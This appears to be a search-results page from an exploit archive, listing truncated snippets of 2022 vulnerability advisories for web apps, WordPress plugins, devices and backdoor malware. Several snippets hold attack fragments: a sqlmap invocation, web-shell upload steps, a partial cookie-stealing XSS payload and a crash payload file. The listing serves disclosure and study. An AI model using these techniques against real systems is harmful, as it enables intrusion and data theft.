50773 matches found
MiniTool Partition Wizard 12.0 Unquoted Service Path
Exploit Title: MiniTool Partition Wizard - Unquoted Service Path Date: 08/04/2022 Exploit Author: Saud Alenazi Vendor Homepage: https://www.minitool.com/ Software Link: https://www.minitool.com/download-center/ Version: 12.0 Tested: Windows 10 PoC : C:\Users\saudhsc qc MTSchedulerService SC...
WordPress LayerSlider Cross Site Scripting
Tittle: WordPress Plugin LayerSlider 5. Exit 6. Save Project 7. XSS will trigger when accessing the project again for example there seem to be other place when its triggered as well, like in the Project's settings POC2 via file,json 1. Add new post & Create Blank Project 2. Import Projects 3. Loa...
Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 Local File Inclusion
Exploit Title: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion LFI Date: 7/4/2022 Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: https://www.franklinfueling.com/ Version: 1.8.19.8580 Tested on: Linux Firefox CVE : CVE-2021-46417 Proof of Concept...
SAM SUNNY TRIPOWER 5.0 Insecure Direct Object Reference
Exploit Title: SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference IDOR Date: 7/4/2022 Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: https://www.sma.de Version: SUNNY TRIPOWER 5.0 Firmware version 3.10.16.R Tested on: Linux Firefox CVE : CVE-2021-46416 Proof of Concept...
Razer Sila 2.0.418 Command Injection
Exploit Title: Razer Sila - Command Injection Google Dork: N/A Date: 4/9/2022 Exploit Author: Kevin Randall Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila Version:...
WordPress Anti-Malware Security And Brute-Force Firewall Cross Site Scripting
Tittle: WordPress Plugin Anti-Malware Security and Brute-Force Firewall HTTP/1.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzi...
Razer Sila 2.0.418 Local File Inclusion
Exploit Title: Razer Sila - Local File Inclusion LFI Google Dork: N/A Date: 4/9/2022 Exploit Author: Kevin Randall Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila Version:...
PHPGurukul Zoo Management System 1.0 SQL Injection
Zoo Management System SQL Injection Author: D4rkP0w4r Description = sql injection at /animals?classid=1 Injection Point http://192.168.1.101:8080/ZooManagementSystem/publichtml/animals?classid=1 Exploit Exploit with Sqlmap python3 sqlmap.py -u...
PHPGurukul Zoo Management System 1.0 Shell Upload
Zoo Management System Unrestricted File Upload + RCE Author: D4rkP0w4r Note = don't need register or login account Description= Upload web shell at Upload CV Step to Reproduct Access Vacancies - upload web shell at - Upload CV - APPLY Exploit Upload web shell at Upload CV When upload success acce...
Car Rental System 1.0 SQL Injection
Car Rental System SQL Injection Author: D4rkP0w4r Note = Login to customer Injection Point = http://192.168.1.101:8080/CarRental/booking.php?id=1 Exploit Exploit with Sqlmap + Burp Suite Use Burp Suite capture request Then save as sqlicar.txt GET /CarRental/booking.php?id=1 HTTP/1.1 Host:...
Movie Seat Reservation System 1.0 File Disclosure / SQL Injection
Movie Seat Reservation System Sql Injection Author: D4rkP0w4r Note = exploit don't need login account Exploit Use Burp Suite capture request with payload GET...
E-Commerce Website 1.1.0 Shell Upload
Full-Ecommece-Website-Slides-Unrestricted-File-Upload-RCE-POC Author: D4rkP0w4r Description = Upload web shell at Slides in admin panel Step to Reproduct Login to admin - Slides - upload web shell - Submit Exploit Upload web shell at Slides When upload success access...
Reprise License Manager 14.2 Cross Site Scripting / Information Disclosure
Multiple Vulnerabilities in Reprise License Manager 14.2 Credit: Giulia Melotti Garibaldi ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// Product:...
School Club Application System 1.0 Local File Inclusion
Title: School Club Application System 1.0 LFI To RCE Author: Hejap Zairy Date: 08.04.2022 Vendor: https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scas0.zip Referenc...
Online Sports Complex Booking System 1.0 Cross Site Scripting
Title: Online Sports Complex Booking System 1.0 XSS Author: Zllggggg Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs1.zip Reference:...
WordPress SiteGround Security 1.2.5 Authentication Bypass
Description: Authentication Bypass via 2-Factor Authentication Setup Affected Plugin: SiteGround Security Plugin Slug: sg-security Plugin Developer: SiteGround Affected Versions: = 1.2.5 CVE ID: CVE-2022-0992 CVSS Score: 9.8 Critical CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H...
Musical World 1 Shell Upload
Musical-World-Unrestricted-File-Upload-RCE-POC Author: D4rkP0w4r Note Login to client. don't need login to admin Description Upload web shell at UploadedSongs Step to Reproduct Login to user - TRACK - UploadedSongs - Choose File - UPLOAD - access /songs/uploadedsongs/shell.php Exploit When upload...
Simple House Rental System 1 Shell Upload
Simple House Rental System Unrestricted File Upload + RCE Author: D4rkP0w4r Note = login to client, don't need login to admin Description = Login to client = Upload web shell at Image Step to Reproduct Login to client - Register - Apartment Registration - Image - Submit Exploit Upload web shell a...
AeroCMS 0.0.1 Cross Site Scripting
AeroCMS-Comment-StoredXSS-POC Author: D4rkP0w4r Note = Don't need register or login account Description = StoredXSS at comment box Step to Reproduct Click Read More - input payload at Author - click Submit button Exploit Input payload at Author - click Submit button When admin login to admin pane...
Social Codia SMS 1 Cross Site Scripting
sms-AddStudent-StoredXSS-POC Author: D4rkP0w4r Description = StoredXSS at Add Student Step to Reproduct Login to admin - Students - Add Student - input payload at Enter Name Exploit Input payload at Enter Name - clicked Add Students - access All Student - The XSS will trigger Log out admin and...
Social Codia SMS 1 Shell Upload
sms-Unrestricted-File-Upload-RCE-POC Author: D4rkP0w4r Description - Upload web shell at avartar teacher in admin panel Step to Reproduct Login to admin - Teacher - Add Teacher - upload web shell at avartar teacher - Add Teacher Exploit Upload web shell at avartar teacher When upload success acce...
AeroCMS 0.0.1 Shell Upload
AeroCMS-Unrestricted-File-Upload-POC Author: D4rkP0w4r Description = Upload web shell at Post Image in admin panel Step to Reproduct Login to admin panel - Posts - Add Posts - Post Image - upload malicious file shell.php - access /images/shell.php on url - shell.php page Exploit When upload succe...
E-Commerce Website 1.0 Shell Upload
Ecommerce Website Unrestricted File Upload + RCE Author: D4rkP0w4r Note = Create account, don't need login client or admin Description = Create account upload web shell at Customer Image Step to Reproduct Register - upload web shell at Customer Image - clicked Register button Exploit Upload web...
Kramer VIAware Remote Code Execution
Exploit Title: Remote Code Execution as Root on KRAMER VIAware Date: 31/03/2022 Exploit Author: sharkmoos Vendor Homepage: https://www.kramerav.com/ Software Link: https://www.kramerav.com/us/product/viaware Version: Tested on: ViaWare Go Linux CVE : CVE-2021-35064, CVE-2021-36356 import sys,...
minewebcms 1.15.2 Cross Site Scripting
Exploit Title: minewebcms 1.15.2 - Cross-site Scripting XSS Google Dork: NA Date: 02/20/2022 Exploit Author: Chetanya Sharma @AggressiveUser Vendor Homepage: https://mineweb.org/ Software Link: https://github.com/mineweb/minewebcms Version: 1.15.2 Tested on: KALI OS CVE : CVE-2022-1163...
qdPM 9.2 Cross Site Request Forgery
Exploit Title: qdPM 9.2 - Cross-site Request Forgery CSRF Google Dork: NA Date: 03/27/2022 Exploit Author: Chetanya Sharma @AggressiveUser Vendor Homepage: https://qdpm.net/ Software Link: https://sourceforge.net/projects/qdpm/files/latest/download Version: 9.2 Tested on: KALI OS CVE :...
WordPress UpdraftPlus Cross Site Scripting
Tittle: WordPress Plugin UpdraftPlus confirm1 Classification Type XSS OWASP top 10 A7: Cross-Site Scripting XSS CWE-79 wpScan: https://wpscan.com/vulnerability/7337543f-4c2c-4365-aebf-3423e9d2f872...
binutils 2.37 Objdump Segmentation Fault
Exploit Title: binutils 2.37 - Objdump Segmentation Fault Date: 2021-11-03 Exploit Author: p3tryx Vendor Homepage: https://www.gnu.org/software/binutils/ Version: binutils 2.37 Tested on: Ubuntu 18.04 CVE : CVE-2021-43149 Payload file %223"\972\00\0083=Q333A11111111411111333333A $$$\FF$\80 1114...
WordPress Ad Inserter Cross Site Scripting
Tittle: WordPress Plugin Ad Inserter Classification Type XSS OWASP top 10 A7: Cross-Site Scripting XSS CWE-79 wpScan: https://wpscan.com/vulnerability/85582b4f-a40a-4394-9834-0c88c5dc57ba...
Backdoor.Win32.Wisell Remote Command Execution
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/837ec70bfb305b5c862ff9b04e70a318.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Wisell Vulnerability: Unauthenticated Remote Command Execution Description: The malwa...
Backdoor.Win32.Wisell Buffer Overflow
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/837ec70bfb305b5c862ff9b04e70a318B.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Wisell Vulnerability: Stack Buffer Overflow SEH Description: The malware listens on...
ICEHRM 31.0.0.0S Cross Site Request Forgery
Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery CSRF to Account Deletion Date: 29/03/2022 Exploit Author: Devansh Bordia Vendor Homepage: https://icehrm.com/ Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS Version: 31.0.0.OS Tested on: Windows 10 CVE:...
WordPress WP Downgrade Cross Site Scripting
Tittle: WordPress Plugin WP Downgrade alert/XSS/ Classification Type XSS OWASP top 10 A7: Cross-Site Scripting XSS CWE-79 wpScan: https://wpscan.com/vulnerability/85582b4f-a40a-4394-9834-0c88c5dc57ba TracWordpress: https://plugins.trac.wordpress.org/changeset/2696091...
WordPress Loco Translate Cross Site Scripting
Tittle: WordPress Plugin Loco Translate ' 7. Save 8. Replicated POC2 via example.po 1. Got to Plugin Loco Translate 2. Enter Plugins Options Any Plugin 3. Upload PO options 3. Load example.po Example.po msgid "" msgstr "" "Project-Id-Version: xss-tester\n" "Report-Msgid-Bugs-To: \n"...
WordPress Hummingbird Cross Site Scripting
Tittle: WordPress Plugin Hummingbird Configs edit the "Name and Description" and put the following payload in the Name field: Save and Click 'Apply' to trigger the XSS Go to Hummingbird's Settings Configs and Upload the following config "id": 1, "name": "", "description": "Xss", "config":...
Backdoor.Win32.FTP.Lana.01.d Man-In-The-Middle
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/ea9ab5983a6fa71e31907e74d4ddbab6B.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.FTP.Lana.01.d Vulnerability: Port Bounce Scan Description: The malware listens on TC...
SAP Information System 1.0.0 Missing Authorization
Exploit Title: SAP Information System 1.0.0 - Improper Authentication Date: 06/04/2022 CVE: CVE-2022-1248 Exploit Author: Mr Empy Software Link: https://www.sourcecodester.com/php/15262/sap-information-system-using-phppdo-oop.html Version: 1.0.0 Tested on: Linux Title: ================ SAP...
Backdoor.Win32.Easyserv.11.c Insecure Transit
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/3b5564e88a0b8a41e4fd730891e635cc.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Easyserv.11.c Vulnerability: Insecure Transit Description: The malware makes outbound...
Backdoor.Win32.Tiny.a Remote Command Execution
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/9fa664bc52e1aa46a09ac51aaa6c7384.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Tiny.a Vulnerability: Unauthenticated Remote Command Execution Description: The malwa...
CSZCMS 1.3.0 SSRF / LFI / Remote Code Execution
Title: CSZCMS V1.3.0 - SSRF To LFI To Rce Author: Hejap Zairy Date: 07.04.2022 Vendor: https://sourceforge.net/projects/cszcms/files/install/ Software: https://liquidtelecom.dl.sourceforge.net/project/cszcms/install/CSZCMS-V1.3.0.zip Reference: https://github.com/Matrix07ksa Tested on: Windows,...
Opmon 9.11 Cross Site Scripting
Exploit Title: Opmon 9.11 - Cross-site Scripting Date: 2021-06-01 Exploit Author: p3tryx Vendor Homepage: https://www.opservices.com.br/monitoramento-real-time Version: 9.11 Tested on: Chrome, IE and Firefox CVE : CVE-2021-43009 URL POC: alertdocument.cookie; var i=new Image;...
FFS Colibri Controller Module 1.8.19.8580 Directory Traversal
============== Author ============== = Name: Momen Eldawakhly Cyber Guy = Company: Cypro.se ====================================== ============== Product ============== = Vendor: Franklin Fueling Systems = Product: FFS Colibri Controller Module = Version: 1.8.19.8580...
School Club Application System 1.0 SQL Injection
Title: School Club Application System v1.0 SQLi Author: nu11secur1ty Date: 04.07.2022 Vendor: https://www.sourcecodester.com/users/tips23 Software: https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html Reference:...
Backdoor.Win32.Verify.h Remote Command Execution
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/82641dabbb1f73dd775e200466a07ec1.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Verify.h Vulnerability: Unauthenticated Remote Command Execution Description: The...
Backdoor.Win32.Xingdoor Denial Of Service
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/89000e259ffbd107b7cc9bac66dcdcf5.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Xingdoor Vulnerability: Denial of Service Description: The malware "SystemXingCheng"...
Zenario CMS 9.0.54156 Remote Code Execution
Exploit Title: Zenario CMS 9.0.54156 - Remote Code Execution RCE Authenticated Date: 04/02/2022 Exploit Author: minhnq22 Vendor Homepage: https://zenar.io/ Software Link: https://zenar.io/download-page Version: 9.0.54156 Tested on: Ubuntu 21.04 CVE : CVE-2021–42171 Python3 import os import sys...
Backdoor.Win32.Bifrose.uw Insecure Permissions
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/9e4f942c60044feef0fb48538ffac383.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Bifrose.uw Vulnerability: Insecure Permissions Description: The malware writes a ".EX...
Backdoor.Win32.FTP.Lana.01.d Hardcoded Credential
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/ea9ab5983a6fa71e31907e74d4ddbab6.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.FTP.Lana.01.d Vulnerability: Weak Hardcoded Credentials Family: Lana Type: PE32 MD5:...
Backdoor.Win32.Ptakks.XP.a Insecure Credential Storage
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/e087725b01dded75d85a20db58335fa8.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Ptakks.XP.a Vulnerability: Insecure Credential Storage Description: The default...
Backdoor.Win32.XLog.21 Authentication Bypass / Race Condition
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/2906b5dc5132dd1319827415e837168f.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.XLog.21 Vulnerability: Authentication Bypass Race Condition Description: The malware...